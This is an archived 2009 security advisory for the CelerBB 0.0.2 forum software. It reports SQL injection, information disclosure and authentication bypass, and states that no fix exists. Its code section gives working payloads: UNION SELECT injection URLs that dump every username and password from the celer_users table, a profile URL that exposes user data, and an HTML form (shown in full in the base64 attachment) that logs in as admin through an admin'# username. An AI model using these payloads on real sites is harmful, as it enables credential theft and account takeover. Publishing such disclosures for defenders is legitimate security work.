TUCoPS :: HP Unsorted C :: va2772.htm

CelerBB 0.0.2 Multiple Vulnerabilities
CelerBB 0.0.2 Multiple Vulnerabilities
CelerBB 0.0.2 Multiple Vulnerabilities


--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/ 

[+] Bugs: [A] Multiple SQL Injection
          [B] Information Disclosure
          [C] Authenticaion Bypass

[+] Exploitation: Remote
[+] Date: 05 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php

This bug allows a guest to view username and
password list.


- [B] Information Disclosure

[-] Requisites: none
[-] File affected: showme.php

This bug allows a guest to view reserved
information of any user.


- [C] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass authentication.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 
1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM
celer_users%23

http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 
1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL
FROM celer_users%23


- [B] Information Disclosure

http://www.site.com/path/showme.php?user=admin 


- [C] Authentication Bypass


  
    CelerBB 0.0.2 Authentication Bypass Exploit
  
  
    

      
      
    

  



*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=US-ASCII; 
	name="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Disposition: attachment; 
	filename="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_frxjjqnq0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDZWxlckJCClsrXSBWZXJzaW9uOiAwLjAuMgpbK10gV2Vic2l0ZTogaHR0cDov
L2NlbGVyYmIuc291cmNlZm9yZ2UubmV0LwoKWytdIEJ1Z3M6IFtBXSBNdWx0aXBsZSBTUUwgSW5q
ZWN0aW9uCiAgICAgICAgICBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0Nd
IEF1dGhlbnRpY2Fpb24gQnlwYXNzCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6
IDA1IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBG
cmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRh
Y3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2Rl
CjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioKClsrXSBCdWdzCgoKLSBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgoKWy1dIFJlcXVpc2l0
ZXM6IG1hZ2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IHZpZXdmb3J1bS5w
aHAsIHZpZXd0b3BpYy5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgdXNlcm5h
bWUgYW5kCnBhc3N3b3JkIGxpc3QuCgoKLSBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQoKWy1d
IFJlcXVpc2l0ZXM6IG5vbmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHNob3dtZS5waHAKClRoaXMgYnVn
IGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgcmVzZXJ2ZWQKaW5mb3JtYXRpb24gb2YgYW55IHVzZXIu
CgoKLSBbQ10gQXV0aGVudGljYXRpb24gQnlwYXNzCgpbLV0gUmVxdWlzaXRlczogbWFnaWNfcXVv
dGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbG9naW4ucGhwCgpUaGlzIGJ1ZyBhbGxv
d3MgYSBndWVzdCB0byBieXBhc3MgYXV0aGVudGljYXRpb24uCgoKKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBs
ZSBTUUwgSW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlld2ZvcnVtLnBocD9p
ZD0tMScgVU5JT04gQUxMIFNFTEVDVCAxLDIsR1JPVVBfQ09OQ0FUKENPTkNBVCh1c2VybmFtZSwg
MHgzYSwgcGFzc3dvcmQpKSw0LDUsNiw3LDggRlJPTSBjZWxlcl91c2VycyUyMwoKaHR0cDovL3d3
dy5zaXRlLmNvbS9wYXRoL3ZpZXd0b3BpYy5waHA/aWQ9MScgVU5JT04gQUxMIFNFTEVDVCAxLDIs
MyxOVUxMLDUsNixHUk9VUF9DT05DQVQoQ09OQ0FUKHVzZXJuYW1lLCAweDNhLCBwYXNzd29yZCkp
LE5VTEwgRlJPTSBjZWxlcl91c2VycyUyMwoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK
Cmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9zaG93bWUucGhwP3VzZXI9YWRtaW4KCgotIFtDXSBB
dXRoZW50aWNhdGlvbiBCeXBhc3MKCjxodG1sPgogIDxoZWFkPgogICAgPHRpdGxlPkNlbGVyQkIg
MC4wLjIgQXV0aGVudGljYXRpb24gQnlwYXNzIEV4cGxvaXQ8L3RpdGxlPgogIDwvaGVhZD4KICA8
Ym9keT4KICAgIDxmb3JtIGFjdGlvbj0ibG9naW4ucGhwIiBtZXRob2Q9IlBPU1QiPgogICAgICA8
aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJVc2VybmFtZSIgdmFsdWU9ImFkbWluJyMiPgogICAg
ICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAgICA8L2Zvcm0+CiAgPC9i
b2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKio--001636c59672d0b3940464601c3f--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH